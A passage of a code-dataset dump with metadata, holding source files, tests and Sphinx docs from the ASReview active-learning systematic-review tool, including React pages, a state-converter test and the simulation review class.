name=section[\"name\"],\n affiliation=section[\"affiliation\"],\n password=section[\"password\"],\n )\n # store password\n user.password = section[\"password\"]\n return user\n\n\ndef get_user_data(test_user_id):\n \"\"\"Returns the data for a user account as a\n dictionary.\"\"\"\n section = config[f\"user{test_user_id}\"]\n return {\n \"email\": section[\"email\"],\n \"name\": section[\"name\"],\n \"affiliation\": section[\"affiliation\"],\n \"password\": section[\"password\"]\n }\n\n\n# get all users\ndef all_users():\n \"\"\"Returns a dictionary containing User models,\n the keys are identifiers in the .ini file.\"\"\"\n users = [get_user(id) for id in [1, 2, 3]]\n return {u.identifier: u for u in users}\n" }, { "alpha_fraction": 0.5462207794189453, "alphanum_fraction": 0.5511147379875183, "avg_line_length": 26.244443893432617, "blob_id": "a0c0f1ae579285a91ba28e2226c6811ada619eae", "content_id": "8db1f94de240bd972e39a75d5d0f902e09050e59", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3678, "license_type": "permissive", "max_line_length": 84, "num_lines": 135, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/ReviewPageFinished.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { useNavigate, useParams } from \"react-router-dom\";\nimport { Button, Fade, Link, Stack, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { ActionsFeedbackBar } from \"../../Components\";\n\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { projectStatuses } from \"../../globals.js\";\nimport ElasFinished from \"../../images/ElasFinished.svg\";\n\nconst PREFIX = \"ReviewPageFinished\";\n\nconst classes = {\n img: `${PREFIX}-img`,\n textTitle: `${PREFIX}-textTitle`,\n text: `${PREFIX}-text`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"inherit\",\n [`& .${classes.img}`]: {\n maxWidth: 350,\n [theme.breakpoints.down(\"md\")]: {\n maxWidth: 250,\n },\n },\n\n [`& .${classes.textTitle}`]: {\n textAlign: \"center\",\n [theme.breakpoints.down(\"md\")]: {\n width: \"80%\",\n },\n },\n\n [`& .${classes.text}`]: {\n textAlign: \"center\",\n width: \"60%\",\n [theme.breakpoints.down(\"md\")]: {\n width: \"80%\",\n },\n },\n}));\n\nconst ReviewPageFinished = (props) => {\n const navigate = useNavigate();\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [recordEmpty, setRecordEmpty] = React.useState(false);\n\n const { error, isError, mutate, reset } = useMutation(\n ProjectAPI.mutateProjectStatus,\n {\n onSuccess: () => {\n queryClient.invalidateQueries(\"fetchInfo\");\n },\n },\n );\n\n const handleChangeStatus = () => {\n mutate({\n project_id,\n status: projectStatuses.REVIEW,\n });\n };\n\n const handleClickExport = () => {\n navigate(`/projects/${project_id}/export`);\n };\n\n const ifRecordPoolEmpty = React.useCallback(async () => {\n const data = await queryClient.fetchQuery(\n [\"fetchRecord\", { project_id }],\n ProjectAPI.fetchRecord,\n );\n setRecordEmpty(data[\"pool_empty\"]);\n }, [project_id, queryClient]);\n\n React.useEffect(() => {\n ifRecordPoolEmpty();\n }, [ifRecordPoolEmpty]);\n\n return (\n <Root aria-label=\"review page finished\">\n <Fade in>\n <Stack\n spacing={1}\n sx={{\n alignItems: \"center\",\n height: \"inherit\",\n justifyContent: \"center\",\n }}\n >\n <img src={ElasFinished} alt=\"ElasFinished\" className={classes.img} />\n {!recordEmpty && (\n <Stack spacing={1} sx={{ alignItems: \"center\" }}>\n <Typography className={classes.textTitle} variant=\"h5\">\n Congratulations! You have finished this project.\n </Typography>\n <Typography className={classes.text}>\n You have stopped reviewing and marked this project as finished.{\" \"}\n <Link\n component=\"button\"\n variant=\"body1\"\n onClick={handleChangeStatus}\n >\n Resume the review\n </Link>\n </Typography>\n </Stack>\n )}\n {recordEmpty && (\n <Stack spacing={3} sx={{ alignItems: \"center\" }}>\n <Typography className={classes.textTitle} variant=\"h5\">\n Congratulations! You have reviewed all the records.\n </Typography>\n <Button onClick={handleClickExport}>Export results</Button>\n </Stack>\n )}\n </Stack>\n </Fade>\n {isError && (\n <ActionsFeedbackBar\n feedback={error?.message + \" Please try again.\"}\n open={isError}\n onClose={reset}\n />\n )}\n </Root>\n );\n};\n\nexport default ReviewPageFinished;\n" }, { "alpha_fraction": 0.6931752562522888, "alphanum_fraction": 0.6951995491981506, "avg_line_length": 37.85393142700195, "blob_id": "ffcc0a0e0300b886f3a4f7f0a10a3a7a3d50e85d", "content_id": "fb3e1f4b690e7107bb7e0c621736268f3d2181cd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3458, "license_type": "permissive", "max_line_length": 85, "num_lines": 89, "path": "/tests/test_converter.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import json\nfrom pathlib import Path\nfrom shutil import copyfile\nfrom shutil import make_archive\nfrom zipfile import ZipFile\n\nfrom asreview.project import ASReviewProject\nfrom asreview.project import open_state\nfrom asreview.state.legacy.json import JSONState\nfrom asreview.state.legacy.utils import open_state as open_state_legacy\nfrom asreview.state.legacy.utils import state_from_file\nfrom asreview.state.sql_converter import is_converted_project\nfrom asreview.state.sql_converter import rollback_conversion\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\n\nOLD_STATE_FP = Path(\"tests\", \"asreview_files\", \"test_converter_example_old.asreview\")\n\n\ndef compare_state_to_converted(state_fp, converted_state_fp):\n \"\"\"Compare an old state file to a converted state file and\n check that the contents are the same\n\n Arguments\n ---------\n state_fp: path-like\n Filepath to the old project file.\n converted_state_fp: path-like\n Filepath to the converted state file.\n \"\"\"\n with open(Path(state_fp.parent, \"labeled.json\"), \"r\") as file:\n labeled_json = json.load(file)\n # old_record_ids = [x[0] for x in labeled_json]\n old_labels = [x[1] for x in labeled_json]\n\n with open_state_legacy(state_fp) as old_state:\n old_state_length = len(old_state._state_dict[\"labels\"])\n\n data_hash = list(old_state._state_dict[\"data_properties\"].keys())[0]\n old_feature_matrix = old_state.get_feature_matrix(data_hash)\n old_settings = old_state.settings.to_dict()\n\n with open_state(converted_state_fp) as new_state:\n # Get data from the new state.\n new_record_ids = new_state.get_order_of_labeling().tolist()\n new_labels = new_state.get_labels().tolist()\n new_settings = new_state.settings.to_dict()\n\n new_project = ASReviewProject(converted_state_fp)\n feature_extraction_method = new_project.feature_matrices[0][\"id\"]\n new_feature_matrix = new_project.get_feature_matrix(feature_extraction_method)\n\n # Compare data.\n # assert old_indices == new_record_ids\n assert max(new_record_ids) < old_state_length\n assert old_labels == new_labels\n # assert old_query_strategies == new_query_strategies\n assert (old_feature_matrix != new_feature_matrix).nnz == 0\n assert old_settings == new_settings\n\n\ndef test_converter(tmpdir):\n # Copy old project file to temporary folder.\n converted_fp = Path(tmpdir, \"converted.asreview\")\n copyfile(OLD_STATE_FP, converted_fp)\n\n # Unzip the converted state file.\n unzipped_fp = Path(tmpdir, \"unzipped.asreview\")\n with ZipFile(converted_fp) as zipobj:\n zipobj.extractall(unzipped_fp)\n converted_fp = unzipped_fp\n # -------------------------------------------------\n # Convert the old project file to a new state file.\n upgrade_asreview_project_file(converted_fp, from_version=0, to_version=1)\n\n # Check that the contents are the same.\n compare_state_to_converted(\n Path(converted_fp, \"legacy\", \"result.json\"), converted_fp\n )\n\n # Check if the rollback works.\n assert is_converted_project(converted_fp)\n rollback_conversion(converted_fp)\n\n # Zip the converted file to allow for reading it.\n zipped_fp = make_archive(Path(tmpdir, \"zipped\"), \"zip\", converted_fp)\n zipped_fp = Path(zipped_fp).rename(Path(tmpdir, \"zipped.asreview\"))\n\n state = state_from_file(zipped_fp)[zipped_fp.name]\n assert isinstance(state, JSONState)\n" }, { "alpha_fraction": 0.6393629312515259, "alphanum_fraction": 0.6496018171310425, "avg_line_length": 34.8775520324707, "blob_id": "3fc8aff4d7f74ada6cf2760dd17ffef38ff836e2", "content_id": "1e699891df832124bc6d5989c684b5c3fe0f2fba", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1758, "license_type": "permissive", "max_line_length": 88, "num_lines": 49, "path": "/asreview/state/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom pathlib import Path\n\nfrom asreview.state.errors import StateNotFoundError\n\nV3STATE_VERSION = \"1.0\"\n\n\ndef is_zipped_project_file(fp):\n \"\"\"Check if it is a zipped asreview project file.\"\"\"\n if Path(fp).is_file():\n state_ext = Path(fp).suffix\n\n if state_ext in [\".h5\", \".hdf5\", \".he5\", \".json\"]:\n raise ValueError(\n f\"State file with extension {state_ext} is no longer \"\n f\"supported. Migrate to the new format or \"\n \"use an older version of ASReview. See LINK.\"\n )\n elif state_ext == \".asreview\":\n return True\n else:\n raise ValueError(f\"State file extension {state_ext} is not \" f\"recognized.\")\n else:\n return False\n\n\ndef is_valid_project_folder(fp):\n \"\"\"Check of the folder contains an asreview project.\"\"\"\n if not Path(fp, \"reviews\").is_dir() or not Path(fp, \"feature_matrices\").is_dir():\n raise StateNotFoundError(\n f\"There does not seem to be a valid project folder at {fp}. The \"\n f\"'reviews' or 'feature_matrices' folder is missing.\"\n )\n else:\n return\n" }, { "alpha_fraction": 0.6971312165260315, "alphanum_fraction": 0.6976014971733093, "avg_line_length": 15.740157127380371, "blob_id": "8b4401a6cb1ba8ef61a61d5a6b79f6d5722c8a1a", "content_id": "72bd61ecff1b6e76f49a6dbfdfb63ba84071be0c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6379, "license_type": "permissive", "max_line_length": 92, "num_lines": 381, "path": "/docs/source/reference.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": ".. _api_ref:\n\n=============\nAPI Reference\n=============\n\n\n.. automodule:: asreview\n\nData and datasets\n=================\n\n.. automodule:: asreview.data\n\n.. currentmodule:: asreview\n\nRead data\n---------\n\n.. autosummary::\n :toctree: generated/\n\n load_data\n ASReviewData\n\n\nStatistics\n----------\n\n.. autosummary::\n :toctree: generated/\n\n data.statistics.abstract_length\n data.statistics.n_duplicates\n data.statistics.n_irrelevant\n data.statistics.n_keywords\n data.statistics.n_missing_abstract\n data.statistics.n_missing_title\n data.statistics.n_records\n data.statistics.n_relevant\n data.statistics.n_unlabeled\n data.statistics.title_length\n\n\nDatasets\n--------\n\nAvailable datasets\n~~~~~~~~~~~~~~~~~~\n\n.. automodule:: asreview.datasets\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n\n.. autosummary::\n :toctree: generated/\n\n asreview.datasets.BenchmarkDataGroup\n asreview.datasets.NaturePublicationDataGroup\n\nDataset managers\n~~~~~~~~~~~~~~~~\n\n.. autosummary::\n :toctree: generated/\n\n asreview.datasets.BaseDataSet\n asreview.datasets.BaseDataGroup\n asreview.datasets.DatasetManager\n\n\nReviewer\n========\n\n.. automodule:: asreview.review\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n review.BaseReview\n review.ReviewSimulate\n\n\n.. _ref-models:\n\nModels\n======\n\nThis section provides an overview of the available models for active learning\nin ASReview. For command line usage, use the name (``example``) given behind\nthe model description (or see the name property of the model). Some models\nrequire additional dependencies, see the model class for more information and\ninstructions.\n\n.. automodule:: asreview.models\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\nBase class\n\n.. autosummary::\n :toctree: generated/\n\n models.base.BaseModel\n\n.. _ref-feature-extraction:\n\n:mod:`asreview.models.feature_extraction`\n-----------------------------------------\n\n.. automodule:: asreview.models.feature_extraction\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n feature_extraction.base.BaseFeatureExtraction\n feature_extraction.Tfidf\n feature_extraction.Doc2Vec\n feature_extraction.EmbeddingIdf\n feature_extraction.EmbeddingLSTM\n feature_extraction.SBERT\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n feature_extraction.get_feature_model\n feature_extraction.get_feature_class\n feature_extraction.list_feature_extraction\n\n.. _ref-classifiers:\n\n:mod:`asreview.models.classifiers`\n----------------------------------\n\n.. automodule:: asreview.models.classifiers\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n classifiers.base.BaseTrainClassifier\n classifiers.NaiveBayesClassifier\n classifiers.RandomForestClassifier\n classifiers.SVMClassifier\n classifiers.LogisticClassifier\n classifiers.LSTMBaseClassifier\n classifiers.LSTMPoolClassifier\n classifiers.NN2LayerClassifier\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n classifiers.get_classifier\n classifiers.get_classifier_class\n classifiers.list_classifiers\n\n\n\n.. _ref-query-strategies:\n\n:mod:`asreview.models.query`\n----------------------------\n\n.. automodule:: asreview.models.query\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n query.base.BaseQueryStrategy\n query.base.ProbaQueryStrategy\n query.MaxQuery\n query.MixedQuery\n query.MaxRandomQuery\n query.MaxUncertaintyQuery\n query.UncertaintyQuery\n query.RandomQuery\n query.ClusterQuery\n\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n query.get_query_model\n query.get_query_class\n query.list_query_strategies\n\n \n.. _ref-balance-strategies:\n\n:mod:`asreview.models.balance`\n------------------------------\n\n.. automodule:: asreview.models.balance\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview.models\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n balance.base.BaseBalance\n balance.SimpleBalance\n balance.DoubleBalance\n balance.TripleBalance\n balance.UndersampleBalance\n\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n balance.get_balance_model\n balance.get_balance_class\n balance.list_balance_strategies\n\n\n\n\n\nProjects and States\n===================\n\nLoad, interact, and extract information from project files and states (the\n\"diary\" of the review).\n\n.. automodule:: asreview.project\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\nASReviewProject\n---------------\n\n.. autosummary::\n :toctree: generated/\n\n ASReviewProject\n\nState\n-----\n\n.. automodule:: asreview.state\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n open_state\n state.SQLiteState\n\n\nUtils\n-----\n\n.. autosummary::\n :toctree: generated/\n\n project.get_project_path\n project.project_from_id\n project.get_projects\n project.is_project\n project.is_v0_project\n\n\nReaders and writers\n===================\n\nThis module contains the input and output functionality. You can install them as extensions.\n\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n asreview.list_readers\n asreview.list_writers\n\n.. automodule:: asreview.io\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n io.CSVReader\n io.CSVWriter\n io.ExcelReader\n io.ExcelWriter\n io.PaperRecord\n io.RISReader\n io.RISWriter\n io.TSVWriter\n\nMisc\n====\n\n.. currentmodule:: asreview\n\nClasses\n\n.. autosummary::\n :toctree: generated/\n\n asreview.settings.ASReviewSettings\n\nFunctions\n\n.. autosummary::\n :toctree: generated/\n\n search.fuzzy_find\n asreview_path\n get_data_home\n\n\nEntry points\n============\n\nEntry points for ASReview LAB.\n\n\n.. automodule:: asreview.entry_points\n :no-members:\n :no-inherited-members:\n\n.. currentmodule:: asreview\n\n.. autosummary::\n :toctree: generated/\n\n entry_points.BaseEntryPoint\n entry_points.AlgorithmsEntryPoint\n entry_points.LABEntryPoint\n entry_points.SimulateEntryPoint\n entry_points.StateInspectEntryPoint\n\n" }, { "alpha_fraction": 0.5602137446403503, "alphanum_fraction": 0.5610357522964478, "avg_line_length": 26.965517044067383, "blob_id": "b444aa381df6fc74045f31294629643963862c6b", "content_id": "8c11171cfa24393f42006a208257891b826ca8f3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2433, "license_type": "permissive", "max_line_length": 75, "num_lines": 87, "path": "/asreview/webapp/src/HomeComponents/HomePage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Navigate, Routes, Route } from \"react-router-dom\";\nimport clsx from \"clsx\";\nimport { Box } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport {\n ProfilePage,\n ProjectsOverview,\n} from \"../HomeComponents/DashboardComponents\";\nimport RouteNotFound from \"../RouteNotFound\";\n\nimport { drawerWidth } from \"../globals.js\";\n\nconst PREFIX = \"HomePage\";\n\nconst classes = {\n content: `${PREFIX}-content`,\n contentShift: `${PREFIX}-contentShift`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.content}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.leavingScreen,\n }),\n [theme.breakpoints.up(\"md\")]: {\n marginLeft: 72,\n },\n },\n\n [`& .${classes.contentShift}`]: {\n transition: theme.transitions.create(\"margin\", {\n easing: theme.transitions.easing.easeOut,\n duration: theme.transitions.duration.enteringScreen,\n }),\n marginLeft: drawerWidth,\n },\n}));\n\nconst HomePage = (props) => {\n return (\n <Root aria-label=\"home page\">\n <Box\n component=\"main\"\n className={clsx(\"main-page-content\", classes.content, {\n [classes.contentShift]: !props.mobileScreen && props.onNavDrawer,\n })}\n aria-label=\"home page content\"\n >\n <Routes>\n {/* Projects dashboard */}\n <Route\n path=\"projects\"\n element={\n <ProjectsOverview\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n onProjectSetup={props.onProjectSetup}\n projectCheck={props.projectCheck}\n setProjectCheck={props.setProjectCheck}\n toggleProjectSetup={props.toggleProjectSetup}\n />\n }\n />\n {/* Profile page */}\n <Route\n path=\"profile\"\n element={\n <ProfilePage\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n />\n }\n />\n {/* Redirect root to projects */}\n <Route path=\"/\" element={<Navigate to=\"/projects\" />} />\n {/* Not found */}\n <Route path=\"*\" element={<RouteNotFound />} />\n </Routes>\n </Box>\n </Root>\n );\n};\n\nexport default HomePage;\n" }, { "alpha_fraction": 0.5883496403694153, "alphanum_fraction": 0.5913828015327454, "avg_line_length": 35.52840805053711, "blob_id": "6436fcf014c52cd0398aac0c014bdba32a59b701", "content_id": "99bb1823399d17828c913785e83bb9e0b8c29a25", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12858, "license_type": "permissive", "max_line_length": 88, "num_lines": 352, "path": "/asreview/review/simulate.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom datetime import datetime\n\nimport numpy as np\nimport pandas as pd\n\nfrom asreview.project import open_state\nfrom asreview.review import BaseReview\nfrom asreview.review.base import LABEL_NA\nfrom asreview.utils import get_random_state\n\n\ndef sample_prior_knowledge(\n labels, n_prior_included=10, n_prior_excluded=10, random_state=None\n):\n \"\"\"Function to sample prelabelled articles.\n\n Arguments\n ---------\n labels: np.ndarray\n Array of labels, with 1 -> included, 0 -> excluded.\n n_prior_included: int\n The number of positive labels.\n n_prior_excluded: int\n The number of negative labels.\n random_state : int, RandomState instance or None, optional (default=None)\n If int, random_state is the seed used by the random number generator;\n If RandomState instance, random_state is the random number generator;\n If None, the random number generator is the RandomState instance used\n by `np.random`.\n\n Returns\n -------\n np.ndarray:\n An array with n_included and n_excluded indices.\n\n \"\"\"\n # set random state\n r = get_random_state(random_state)\n\n # retrieve the index of included and excluded papers\n included_idx = np.where(labels == 1)[0]\n excluded_idx = np.where(labels == 0)[0]\n\n if len(included_idx) < n_prior_included:\n raise ValueError(\n f\"Number of included priors requested ({n_prior_included})\"\n f\" is bigger than number of included papers \"\n f\"({len(included_idx)}).\"\n )\n if len(excluded_idx) < n_prior_excluded:\n raise ValueError(\n f\"Number of excluded priors requested ({n_prior_excluded})\"\n f\" is bigger than number of excluded papers \"\n f\"({len(excluded_idx)}).\"\n )\n # select randomly from included and excluded papers\n included_indexes_sample = r.choice(included_idx, n_prior_included, replace=False)\n excluded_indexes_sample = r.choice(excluded_idx, n_prior_excluded, replace=False)\n\n init = np.append(included_indexes_sample, excluded_indexes_sample)\n\n return init\n\n\nclass ReviewSimulate(BaseReview):\n \"\"\"ASReview Simulation mode class.\n\n Arguments\n ---------\n as_data: asreview.ASReviewData\n The data object which contains the text, labels, etc.\n model: BaseModel\n Initialized model to fit the data during active learning.\n See asreview.models.utils.py for possible models.\n query_model: BaseQueryModel\n Initialized model to query new instances for review, such as random\n sampling or max sampling.\n See asreview.query_strategies.utils.py for query models.\n balance_model: BaseBalanceModel\n Initialized model to redistribute the training data during the\n active learning process. They might either resample or undersample\n specific papers.\n feature_model: BaseFeatureModel\n Feature extraction model that converts texts and keywords to\n feature matrices.\n n_prior_included: int\n Sample n prior included papers.\n n_prior_excluded: int\n Sample n prior excluded papers.\n prior_indices: int\n Prior indices by row number.\n n_instances: int\n Number of papers to query at each step in the active learning\n process.\n stop_if: int\n Number of steps/queries to perform. Set to None for no limit.\n start_idx: numpy.ndarray\n Start the simulation/review with these indices. They are assumed to\n be already labeled. Failing to do so might result bad behaviour.\n init_seed: int\n Seed for setting the prior indices if the --prior_idx option is\n not used. If the option prior_idx is used with one or more\n index, this option is ignored.\n state_file: str\n Path to state file.\n write_interval: int\n After how many labeled records to write the simulation data to the\n state.\n \"\"\"\n\n name = \"simulate\"\n\n def __init__(\n self,\n as_data,\n *args,\n n_prior_included=0,\n n_prior_excluded=0,\n prior_indices=None,\n init_seed=None,\n write_interval=None,\n **kwargs,\n ):\n self.n_prior_included = n_prior_included\n self.n_prior_excluded = n_prior_excluded\n\n self.write_interval = write_interval\n\n # check for partly labeled data\n labels = as_data.labels\n labeled_idx = np.where((labels == 0) | (labels == 1))[0]\n if len(labeled_idx) != len(labels):\n raise ValueError(\"Expected fully labeled dataset.\")\n\n if prior_indices is not None and len(prior_indices) != 0:\n start_idx = prior_indices\n else:\n start_idx = as_data.prior_data_idx\n if len(start_idx) == 0 and n_prior_included + n_prior_excluded > 0:\n start_idx = sample_prior_knowledge(\n labels, n_prior_included, n_prior_excluded, random_state=init_seed\n )\n super(ReviewSimulate, self).__init__(\n as_data, *args, start_idx=start_idx, **kwargs\n )\n\n # Setup the reviewer attributes that take over the role of state\n # functions.\n with open_state(self.project) as state:\n # Check if there is already a ranking stored in the state.\n if state.model_has_trained:\n self.last_ranking = state.get_last_ranking()\n else:\n self.last_ranking = None\n\n self.labeled = state.get_labeled()\n self.pool = pd.Series(\n [\n record_id\n for record_id in self.record_table\n if record_id not in self.labeled[\"record_id\"].values\n ]\n )\n self.training_set = len(self.labeled)\n\n # Get the number of queries.\n training_sets = state.get_training_sets()\n # There is one query per trained model. We subtract 1\n # for the priors.\n self.total_queries = len(set(training_sets)) - 1\n\n # Check that both labels are available.\n if (0 not in self.labeled[\"label\"].values) or (\n 1 not in self.labeled[\"label\"].values\n ):\n raise ValueError(\n \"Not both labels available Make sure there\"\n \" is an included and excluded record in \"\n \"the priors.\"\n )\n\n self.results = pd.DataFrame(\n [],\n columns=[\n \"record_id\",\n \"label\",\n \"classifier\",\n \"query_strategy\",\n \"balance_strategy\",\n \"feature_extraction\",\n \"training_set\",\n \"labeling_time\",\n \"notes\",\n ],\n )\n\n def _label_priors(self):\n \"\"\"Make sure all the priors are labeled as well as the pending\n labels.\"\"\"\n with open_state(self.project, read_only=False) as state:\n # Make sure the prior records are labeled.\n labeled = state.get_labeled()\n unlabeled_priors = [\n x for x in self.prior_indices if x not in labeled[\"record_id\"].to_list()\n ]\n labels = self.data_labels[unlabeled_priors]\n\n with open_state(self.project, read_only=False) as s:\n s.add_labeling_data(unlabeled_priors, labels, prior=True)\n\n # Make sure the pending records are labeled.\n pending = state.get_pending()\n pending_labels = self.data_labels[pending]\n state.add_labeling_data(pending, pending_labels)\n\n def _stop_review(self):\n \"\"\"In simulation mode, the stop review function should get the labeled\n records list from the reviewer attribute.\"\"\"\n\n # if the pool is empty, always stop\n if self.pool.empty:\n return True\n\n # If stop_if is set to min, stop when all papers in the pool are\n # irrelevant.\n if self.stop_if == \"min\" and (self.data_labels[self.pool] == 0).all():\n return True\n\n # Stop when reaching stop_if (if provided)\n if isinstance(self.stop_if, int) and self.total_queries >= self.stop_if:\n return True\n\n return False\n\n def train(self):\n \"\"\"Train a new model on the labeled data.\"\"\"\n # Check if both labels are available is done in init for simulation.\n # Use the balance model to sample the trainings data.\n new_training_set = len(self.labeled)\n\n y_sample_input = (\n pd.DataFrame(self.record_table)\n .merge(self.labeled, how=\"left\", on=\"record_id\")\n .loc[:, \"label\"]\n .fillna(LABEL_NA)\n .to_numpy()\n )\n train_idx = np.where(y_sample_input != LABEL_NA)[0]\n\n X_train, y_train = self.balance_model.sample(self.X, y_sample_input, train_idx)\n\n # Fit the classifier on the trainings data.\n self.classifier.fit(X_train, y_train)\n\n # Use the query strategy to produce a ranking.\n ranked_record_ids = self.query_strategy.query(\n self.X, classifier=self.classifier\n )\n\n self.last_ranking = pd.concat(\n [pd.Series(ranked_record_ids), pd.Series(range(len(ranked_record_ids)))],\n axis=1,\n )\n self.last_ranking.columns = [\"record_id\", \"label\"]\n\n self.training_set = new_training_set\n\n def _query(self, n):\n \"\"\"In simulation mode, the query function should get the n highest\n ranked unlabeled records, without writing the model data to the results\n table. The\"\"\"\n unlabeled_ranking = self.last_ranking[\n self.last_ranking[\"record_id\"].isin(self.pool)\n ]\n\n self.total_queries += 1\n\n return unlabeled_ranking[\"record_id\"].iloc[:n].to_list()\n\n def _label(self, record_ids, prior=False):\n \"\"\"In simulation mode, the label function should also add the model\n data to the results table.\"\"\"\n\n labels = self.data_labels[record_ids]\n labeling_time = datetime.now()\n\n results = []\n for record_id, label in zip(record_ids, labels):\n results.append(\n {\n \"record_id\": int(record_id),\n \"label\": int(label),\n \"classifier\": self.classifier.name,\n \"query_strategy\": self.query_strategy.name,\n \"balance_strategy\": self.balance_model.name,\n \"feature_extraction\": self.feature_extraction.name,\n \"training_set\": int(self.training_set),\n \"labeling_time\": str(labeling_time),\n \"notes\": None,\n }\n )\n\n self.results = pd.concat(\n [self.results, pd.DataFrame(results)], ignore_index=True\n )\n\n # Add the record ids to the labeled and remove from the pool.\n new_labeled_data = pd.DataFrame(\n zip(record_ids, labels), columns=[\"record_id\", \"label\"]\n )\n self.labeled = pd.concat([self.labeled, new_labeled_data], ignore_index=True)\n self.pool = self.pool[~self.pool.isin(record_ids)]\n\n if (self.write_interval is not None) and (\n len(self.results) >= self.write_interval\n ):\n self._write_to_state()\n\n return labels\n\n def _write_to_state(self):\n \"\"\"Write the data that has not yet been written to the state.\"\"\"\n # Write the data to the state.\n if len(self.results) > 0:\n rows = [tuple(self.results.iloc[i]) for i in range(len(self.results))]\n with open_state(self.project, read_only=False) as state:\n state._add_labeling_data_simulation_mode(rows)\n\n state.add_last_ranking(\n self.last_ranking[\"record_id\"].to_numpy(),\n self.classifier.name,\n self.query_strategy.name,\n self.balance_model.name,\n self.feature_extraction.name,\n self.training_set,\n )\n\n # Empty the results table in memory.\n self.results.drop(self.results.index, inplace=True)\n" }, { "alpha_fraction": 0.40704286098480225, "alphanum_fraction": 0.4314807057380676, "avg_line_length": 39.77854537963867, "blob_id": "c9ab9aee9b0f8aecb060425efbacf0ec41ed56e4", "content_id": "c2c96219a7bb828d795b0f23c16a129b933ddd1f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11785, "license_type": "permissive", "max_line_length": 152, "num_lines": 289, "path": "/asreview/config.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nLABEL_NA = -1\n\nKERAS_MODELS = [\"lstm_base\", \"lstm_pool\"]\n\n# project types\nPROJECT_MODE_ORACLE = \"oracle\"\nPROJECT_MODE_EXPLORE = \"explore\"\nPROJECT_MODE_SIMULATE = \"simulate\"\nPROJECT_MODES = 